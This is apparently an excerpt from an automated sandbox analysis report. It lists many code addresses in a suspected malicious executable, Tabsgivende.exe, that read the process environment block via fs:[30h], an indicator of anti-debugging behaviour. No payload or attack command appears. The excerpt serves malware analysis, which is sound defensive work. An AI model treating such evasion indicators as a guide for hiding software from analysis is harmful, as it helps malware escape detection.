Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225283C0 mov eax, dword ptr fs:[00000030h] 18_2_225283C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A63C0 mov eax, dword ptr fs:[00000030h] 18_2_225A63C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E3F0 mov eax, dword ptr fs:[00000030h] 18_2_2253E3F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225563FF mov eax, dword ptr fs:[00000030h] 18_2_225563FF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225303E9 mov eax, dword ptr fs:[00000030h] 18_2_225303E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518397 mov eax, dword ptr fs:[00000030h] 18_2_22518397
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E388 mov eax, dword ptr fs:[00000030h] 18_2_2251E388
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254438F mov eax, dword ptr fs:[00000030h] 18_2_2254438F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522050 mov eax, dword ptr fs:[00000030h] 18_2_22522050
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6050 mov eax, dword ptr fs:[00000030h] 18_2_225A6050
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254C073 mov eax, dword ptr fs:[00000030h] 18_2_2254C073
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E016 mov eax, dword ptr fs:[00000030h] 18_2_2253E016
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4000 mov ecx, dword ptr fs:[00000030h] 18_2_225A4000
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6030 mov eax, dword ptr fs:[00000030h] 18_2_225B6030
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A020 mov eax, dword ptr fs:[00000030h] 18_2_2251A020
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C020 mov eax, dword ptr fs:[00000030h] 18_2_2251C020
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A20DE mov eax, dword ptr fs:[00000030h] 18_2_225A20DE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C0F0 mov eax, dword ptr fs:[00000030h] 18_2_2251C0F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225620F0 mov ecx, dword ptr fs:[00000030h] 18_2_225620F0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A0E3 mov ecx, dword ptr fs:[00000030h] 18_2_2251A0E3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A60E0 mov eax, dword ptr fs:[00000030h] 18_2_225A60E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225280E9 mov eax, dword ptr fs:[00000030h] 18_2_225280E9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252208A mov eax, dword ptr fs:[00000030h] 18_2_2252208A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E60B8 mov eax, dword ptr fs:[00000030h] 18_2_225E60B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E60B8 mov ecx, dword ptr fs:[00000030h] 18_2_225E60B8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B80A8 mov eax, dword ptr fs:[00000030h] 18_2_225B80A8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B8158 mov eax, dword ptr fs:[00000030h] 18_2_225B8158
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526154 mov eax, dword ptr fs:[00000030h] 18_2_22526154
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C156 mov eax, dword ptr fs:[00000030h] 18_2_2251C156
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov ecx, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B4144 mov eax, dword ptr fs:[00000030h] 18_2_225B4144
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 mov ecx, dword ptr fs:[00000030h] 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h] 18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E0115 mov eax, dword ptr fs:[00000030h] 18_2_225E0115
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550124 mov eax, dword ptr fs:[00000030h] 18_2_22550124
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov ecx, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h] 18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E61C3 mov eax, dword ptr fs:[00000030h] 18_2_225E61C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E61C3 mov eax, dword ptr fs:[00000030h] 18_2_225E61C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225501F8 mov eax, dword ptr fs:[00000030h] 18_2_225501F8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F61E5 mov eax, dword ptr fs:[00000030h] 18_2_225F61E5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h] 18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h] 18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h] 18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h] 18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22560185 mov eax, dword ptr fs:[00000030h] 18_2_22560185
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DC188 mov eax, dword ptr fs:[00000030h] 18_2_225DC188
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DC188 mov eax, dword ptr fs:[00000030h] 18_2_225DC188
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253C640 mov eax, dword ptr fs:[00000030h] 18_2_2253C640
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22552674 mov eax, dword ptr fs:[00000030h] 18_2_22552674
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E866E mov eax, dword ptr fs:[00000030h] 18_2_225E866E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E866E mov eax, dword ptr fs:[00000030h] 18_2_225E866E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A660 mov eax, dword ptr fs:[00000030h] 18_2_2255A660
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A660 mov eax, dword ptr fs:[00000030h] 18_2_2255A660
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562619 mov eax, dword ptr fs:[00000030h] 18_2_22562619
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E609 mov eax, dword ptr fs:[00000030h] 18_2_2259E609
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h] 18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2253E627 mov eax, dword ptr fs:[00000030h] 18_2_2253E627
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22556620 mov eax, dword ptr fs:[00000030h] 18_2_22556620
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558620 mov eax, dword ptr fs:[00000030h] 18_2_22558620
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252262C mov eax, dword ptr fs:[00000030h] 18_2_2252262C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A6C7 mov ebx, dword ptr fs:[00000030h] 18_2_2255A6C7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A6C7 mov eax, dword ptr fs:[00000030h] 18_2_2255A6C7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h] 18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A06F1 mov eax, dword ptr fs:[00000030h] 18_2_225A06F1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A06F1 mov eax, dword ptr fs:[00000030h] 18_2_225A06F1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524690 mov eax, dword ptr fs:[00000030h] 18_2_22524690
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524690 mov eax, dword ptr fs:[00000030h] 18_2_22524690
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225566B0 mov eax, dword ptr fs:[00000030h] 18_2_225566B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C6A6 mov eax, dword ptr fs:[00000030h] 18_2_2255C6A6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520750 mov eax, dword ptr fs:[00000030h] 18_2_22520750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562750 mov eax, dword ptr fs:[00000030h] 18_2_22562750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22562750 mov eax, dword ptr fs:[00000030h] 18_2_22562750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE75D mov eax, dword ptr fs:[00000030h] 18_2_225AE75D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A4755 mov eax, dword ptr fs:[00000030h] 18_2_225A4755
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255674D mov esi, dword ptr fs:[00000030h] 18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255674D mov eax, dword ptr fs:[00000030h] 18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255674D mov eax, dword ptr fs:[00000030h] 18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528770 mov eax, dword ptr fs:[00000030h] 18_2_22528770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h] 18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520710 mov eax, dword ptr fs:[00000030h] 18_2_22520710
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550710 mov eax, dword ptr fs:[00000030h] 18_2_22550710
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C700 mov eax, dword ptr fs:[00000030h] 18_2_2255C700
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255273C mov eax, dword ptr fs:[00000030h] 18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255273C mov ecx, dword ptr fs:[00000030h] 18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255273C mov eax, dword ptr fs:[00000030h] 18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259C730 mov eax, dword ptr fs:[00000030h] 18_2_2259C730
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C720 mov eax, dword ptr fs:[00000030h] 18_2_2255C720
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C720 mov eax, dword ptr fs:[00000030h] 18_2_2255C720
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252C7C0 mov eax, dword ptr fs:[00000030h] 18_2_2252C7C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A07C3 mov eax, dword ptr fs:[00000030h] 18_2_225A07C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225247FB mov eax, dword ptr fs:[00000030h] 18_2_225247FB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225247FB mov eax, dword ptr fs:[00000030h] 18_2_225247FB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h] 18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h] 18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h] 18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE7E1 mov eax, dword ptr fs:[00000030h] 18_2_225AE7E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225207AF mov eax, dword ptr fs:[00000030h] 18_2_225207AF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254245A mov eax, dword ptr fs:[00000030h] 18_2_2254245A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h] 18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h] 18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h] 18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h] 18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC460 mov ecx, dword ptr fs:[00000030h] 18_2_225AC460
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h] 18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h] 18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h] 18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A430 mov eax, dword ptr fs:[00000030h] 18_2_2255A430
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h] 18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h] 18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h] 18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C427 mov eax, dword ptr fs:[00000030h] 18_2_2251C427
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225204E5 mov ecx, dword ptr fs:[00000030h] 18_2_225204E5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225544B0 mov ecx, dword ptr fs:[00000030h] 18_2_225544B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AA4B0 mov eax, dword ptr fs:[00000030h] 18_2_225AA4B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225264AB mov eax, dword ptr fs:[00000030h] 18_2_225264AB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528550 mov eax, dword ptr fs:[00000030h] 18_2_22528550
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528550 mov eax, dword ptr fs:[00000030h] 18_2_22528550
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h] 18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h] 18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h] 18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6500 mov eax, dword ptr fs:[00000030h] 18_2_225B6500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225265D0 mov eax, dword ptr fs:[00000030h] 18_2_225265D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A5D0 mov eax, dword ptr fs:[00000030h] 18_2_2255A5D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A5D0 mov eax, dword ptr fs:[00000030h] 18_2_2255A5D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E5CF mov eax, dword ptr fs:[00000030h] 18_2_2255E5CF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E5CF mov eax, dword ptr fs:[00000030h] 18_2_2255E5CF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225225E0 mov eax, dword ptr fs:[00000030h] 18_2_225225E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C5ED mov eax, dword ptr fs:[00000030h] 18_2_2255C5ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C5ED mov eax, dword ptr fs:[00000030h] 18_2_2255C5ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E59C mov eax, dword ptr fs:[00000030h] 18_2_2255E59C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522582 mov eax, dword ptr fs:[00000030h] 18_2_22522582
